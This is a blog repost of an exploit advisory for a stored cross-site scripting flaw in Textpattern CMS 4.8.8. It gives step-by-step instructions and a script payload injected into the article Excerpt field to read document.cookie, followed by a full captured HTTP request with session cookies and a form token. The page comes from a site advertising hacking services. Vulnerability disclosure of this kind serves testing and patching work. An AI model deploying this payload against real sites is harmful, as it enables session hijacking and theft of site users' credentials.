Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863556448

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/


--- Description ---


1) Login admin page , choose Content , Articles section : 
https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write in Excerpt field this payload  > "><script>alert(document.cookie)</script>
3) Click My Site will you see alert button 
https://release-demo.textpattern.co/index.php?id=2


--- Request ---

POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"

2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"

article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"

edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"

"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"

1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"

1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"

4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"

articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"

article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"

2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"

06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"

13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"

19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"

35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"

25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"

alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"


-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"

Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"

async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"

fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--